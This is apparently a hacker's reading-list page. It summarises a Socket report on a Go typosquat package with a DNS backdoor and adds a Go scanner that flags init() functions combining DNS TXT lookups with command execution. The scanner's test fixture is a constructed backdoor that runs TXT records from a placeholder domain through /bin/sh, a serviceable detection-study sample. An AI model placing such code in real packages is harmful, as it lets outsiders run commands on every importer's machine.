Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Popular Go Decimal Library Targeted by Long-Running Typosquat with DNS Backdoor - 2021

Source: Socket
  • github.com/shopspring/decimal is a package with over 30K importers. In 2017, a typosquatted clone named github.com/shopsprint/decimal was published. This is the story of that backdoor.
  • From 2017 to 2023, the typosquatted module was a literal clone of the real one: it tracked upstream releases and changes and looked like a legitimate fork. A later release added two low-impact fixes; v1.3.3 retains those fixes but adds the malicious payload, after almost seven years of waiting. It was only recently caught, after 33 months of being weaponized.
  • The backdoor looks up the TXT records of a specific domain and executes each record as a shell command via exec.Command. The malicious code was wired in through a Go init() function, so it runs as soon as the package is imported; the goroutine it starts stays alive for the lifetime of the process but only issues its queries over five minutes.
  • Another good find by Socket. These supply chain attacks are real concerns that are hard to detect manually.
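As an added example (not code from the Socket write-up or from either decimal module), here is a small Go scanner that parses a source file and flags any init() function whose body, including goroutines it launches, calls both net.LookupTXT and exec.Command. The embedded sample mimics the backdoor's shape using a constructed, non-resolving domain (example.invalid) and is not the real payload; the second sample is a clean init() that should not be flagged.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
)

// suspiciousCalls are the selector expressions that, together inside an init(),
// match the shape of the shopsprint/decimal backdoor: a DNS TXT lookup feeding
// a command execution.
var suspiciousCalls = []string{"net.LookupTXT", "exec.Command", "exec.CommandContext"}

// Finding records one init() function and the suspicious calls found in it.
type Finding struct {
	File  string
	Line  int
	Calls []string
}

// ScanSource parses one Go file and reports init() functions that call both a
// DNS TXT lookup and a command execution. Closures and go statements inside
// init() are walked too, since the real backdoor ran in a goroutine started
// from init().
func ScanSource(filename, src string) ([]Finding, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	var findings []Finding
	for _, decl := range f.Decls {
		fn, ok := decl.(*ast.FuncDecl)
		if !ok || fn.Name.Name != "init" || fn.Recv != nil || fn.Body == nil {
			continue
		}
		seen := map[string]bool{}
		ast.Inspect(fn.Body, func(n ast.Node) bool {
			call, ok := n.(*ast.CallExpr)
			if !ok {
				return true
			}
			sel, ok := call.Fun.(*ast.SelectorExpr)
			if !ok {
				return true
			}
			pkg, ok := sel.X.(*ast.Ident)
			if !ok {
				return true
			}
			name := pkg.Name + "." + sel.Sel.Name
			for _, s := range suspiciousCalls {
				if name == s {
					seen[name] = true
				}
			}
			return true
		})
		hasDNS := seen["net.LookupTXT"]
		hasExec := seen["exec.Command"] || seen["exec.CommandContext"]
		if hasDNS && hasExec {
			var calls []string
			for _, s := range suspiciousCalls {
				if seen[s] {
					calls = append(calls, s)
				}
			}
			findings = append(findings, Finding{File: filename, Line: fset.Position(fn.Pos()).Line, Calls: calls})
		}
	}
	return findings, nil
}

// constructedBackdoor is a constructed sample mimicking the backdoor's shape.
// It is not the real payload; example.invalid is a reserved, non-resolving domain.
const constructedBackdoor = `package decimal

import (
	"net"
	"os/exec"
	"time"
)

func init() {
	go func() {
		for i := 0; i < 5; i++ {
			txts, err := net.LookupTXT("example.invalid")
			if err == nil {
				for _, t := range txts {
					exec.Command("/bin/sh", "-c", t).Run()
				}
			}
			time.Sleep(time.Minute)
		}
	}()
}
`

// cleanSource is a constructed sample with a harmless init() that must not be flagged.
const cleanSource = `package decimal

import "math/big"

var zero = big.NewInt(0)

func init() { _ = zero }
`

func main() {
	samples := map[string]string{"decimal.go": constructedBackdoor, "clean.go": cleanSource}
	for name, src := range samples {
		findings, err := ScanSource(name, src)
		if err != nil {
			fmt.Printf("%s: parse error: %v\n", name, err)
			continue
		}
		for _, f := range findings {
			fmt.Printf("%s:%d init() calls %v\n", f.File, f.Line, f.Calls)
		}
	}
}
```

The match is by selector name only, so an aliased import or a lookup hidden behind a helper in another file would evade it; a production check should resolve packages with go/types and follow calls across the module, and should run over vendored and module-cache sources rather than only the project's own tree.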